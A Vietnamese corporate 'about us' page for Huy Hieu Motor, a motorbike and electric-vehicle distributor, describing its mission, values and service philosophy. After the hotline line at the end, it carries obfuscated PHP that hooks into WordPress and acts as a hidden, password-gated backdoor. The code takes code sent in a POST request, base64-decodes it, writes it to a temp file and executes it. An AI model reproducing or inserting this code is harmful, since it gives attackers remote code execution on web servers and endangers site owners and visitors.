THÔNG TIN HUY HIEU MOTOR

Công ty cổ phần Thương mại và dịch vụ Huy Hiệu

Trải qua 20 năm phát triển, HUY HIEU MOTOR trở thành doanh nghiệp phân phối xe máy 50cc, xe điện thông minh với:

1700+

Nhà Phân Phối

Bằng Sáng Chế

77+

Quốc gia có mặt

12 Năm

Dẫn đầu về doanh số ngành

TRIẾT LÝ KINH DOANH CỦA HUY HIEU MOTOR

“Chế tạo các sản phẩm mang lại hạnh phúc cho người tiêu dùng, để việc lái xe chính là niềm vui”.

THIẾT KẾ HOÀN THIỆN HƠN

HUY HIEU MOTOR hợp tác cùng các nhà máy sản xuất uy tín nhất, nâng cao chất lượng sản phẩm và trải nghiệm của người dùng.

KỸ THUẬT CAO CẤP HƠN

Chúng tôi không ngừng nghiên cứu và sáng tạo nên các sản phẩm mới lạ, độc đáo, cá nhân hóa cho người dùng

CHẤT LƯỢNG SẢN PHẨM ƯU VIỆT HƠN

Để sản phẩm có độ hoàn thiện và độ bền bỉ tốt nhất, tất cả những sản phẩm cung cấp bởi Huy Hiệu Motor đều được tinh chỉnh về khung sườn, xăng điện và động cơ trước khi giao tới khách hàng.

CHẤT LƯỢNG DỊCH VỤ TỐT HƠN

Với phương châm luôn luôn vì khách hàng và hướng tới dịch vụ vàng, chúng tôi luôn sẵn sàng phục vụ quý khách. Chúng tôi lắng nghe, phân tích và thấu hiểu nhu cầu của từng khách hàng để đáp ứng, giải quyết tối ưu những nhu cầu đó.

SỨ MỆNH HƯỚNG TỚI

Sứ mệnh của chúng tôi là trở thành một Công ty chuyên cung cấp những dòng xe đạp điện, xe máy điện, xe 50cc chất lượng, xu hướng với giá thành hợp lý nhất. Huy Hiệu Motor sẽ trở thành thương hiệu được người người, nhà nhà biết đến và tin tưởng lựa chọn.

PHÁT TRIỂN KINH DOANH BỀN VỮNG

Phát triển bền vững là tư tưởng cốt lõi trong tất cả các hoạt động kinh doanh của Huy Hiệu Motor. Chúng tôi tự hào về cam kết hoạt động vì sự phát triển của cộng đồng của mình. Bởi, sự thành công của doanh nghiệp luôn song hành với sự phát triển của xã hội.

SỨ MỆNH CÔNG TY

Tạo ra những sản phẩm mang đến hạnh phúc, sự an toàn và thoải mái cho khách hàng, để việc lái xe trở thành niềm vui.

GIÁ TRỊ QUAN CỐT LÕI

Tập đoàn HUY HIEU MOTOR cam kết “lấy con người làm gốc”, làm giá trị cốt lõi trong mọi hoạt động, nỗ lực tạo ra một văn hóa doanh nghiệp “yêu thương, vị tha và hòa hợp”

TINH THẦN DOANH NGHIỆP

HUY HIEU MOTOR đề cao tinh thần làm việc “Sáng tạo & Hiệu quả”. Chúng tôi dồn tâm huyết vào từng sản phẩm, chú trọng và tỉ mỉ đến từng chi tiết nhỏ nhất.

VĂN HOÁ KINH DOANH

HUY HIEU MOTOR lấy mục tiêu “lợi ích” của đối tác và người dùng làm trọng tâm, cùng xây dựng môi trường hợp tác cùng có lợi qua năm tháng. Cùng nhau phát triển “giá trị thương hiệu, giá trị sản phẩm, giá trị dịch vụ" một cách bền vững.

Hotline: 079.512.9999 Chỉ đường
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}